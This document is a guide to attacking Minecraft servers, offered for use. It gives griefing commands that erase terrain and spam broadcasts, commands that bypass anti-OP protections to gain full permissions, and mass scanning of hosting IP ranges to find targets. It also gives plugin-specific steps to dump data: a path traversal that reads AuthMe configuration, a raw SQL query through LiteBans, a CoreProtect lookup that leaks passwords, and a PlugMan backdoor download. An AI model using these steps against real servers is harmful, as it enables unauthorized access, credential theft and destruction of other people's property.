Minecraft Exploit Methods

1 - Griefing Commands

These commands are used for griefing or causing disruptions on servers:

• /fill ~15 ~15 ~15 ~-15 ~-15 ~-15 air
• //sphere 0 30
• /sp area 5
• /broadcast YOUR MESSAGE
• /discordsrv bcast YOUR MESSAGE everyone

2 - Check Path

Commands to determine if the server is running in a container:

• /protocol dump
• /lp export .

3 - Bypass Methods

Methods to bypass server restrictions:

1. Get Permissions
   • /server {tab}
   • /send {tab}
   • /hub
   • /lobby
   • /opguard op YourName
2. Bypass Anti-OP
   • /lp user YourName p set *
   • /pex user YourName add *
   • /manuaddp YourName *
   • /minecraft:op YourName

4 - Scanning

Steps to find multiple servers using MineScanner:

1. Download MineScanner: MineScanner
2. If you have a large VPS, scan the following range:

   sudo py main.py -ip 127.80.*.* -t 50 -p 0-65535

3. If you don't have a large VPS, scan this range:

   sudo py main.py -ip 127.80.*.* -t 50 -p 25500-25599

4. To find the OVH range: OVH IP Info
5. To find the Hetzner range: Hetzner IP Info

5 - Dump Database

Steps to dump databases based on specific plugins:

• HolographicDisplays (version ≤ 2.3.9)

1. /hd create aaa
2. /hd readtext aaa ../../AuthMe/config.yml

• LiteBans (version ≤ 2.3)

1. /litebans sqlexec SELECT * FROM litebans_history;
2. Check latest.log in your .minecraft folder and copy the database.

• PlugMan (latest version)

1. Use /plugman to check the version.
2. If it's the latest version, use /plugman download your_backdoor.

• CoreProtect (all versions)

1. /coreprotect l 1:999999
2. Check your latest.log.
3. Copy and paste the password along with the names and analyze it.

• Vulcan AntiCheat (before v2.8.8)

1. Craft an anvil from iron blocks and iron ingots.
2. Craft two chests from wooden planks.
3. Collect 1 experience level by killing monsters, mining ores, or performing other actions.
4. Rename the first chest to "Vulcan AntiCheat" by combining it with the anvil.
5. Place the first chest anywhere and open it.
6. Click on the second chest in your inventory to see the Vulcan AntiCheat menu.
7. https://youtu.be/lv1mCT8cR04?si=U1kTgBieZrSleujY

• Essentials

1. /baltop
2. Open PuppyClient and use .baltopdump Page_String User_String Address_String
3. PuppyClient will open a txt file with the dump.

6 - Websites for Dumping a Specific Server

Useful websites for gathering information about servers:

• SecurityTrails - Find subdomains, IPs, or panels.
• Censys - Find a server's backend IP.

7 - PuppyClient for In-Game Methods

• Download: PuppyClient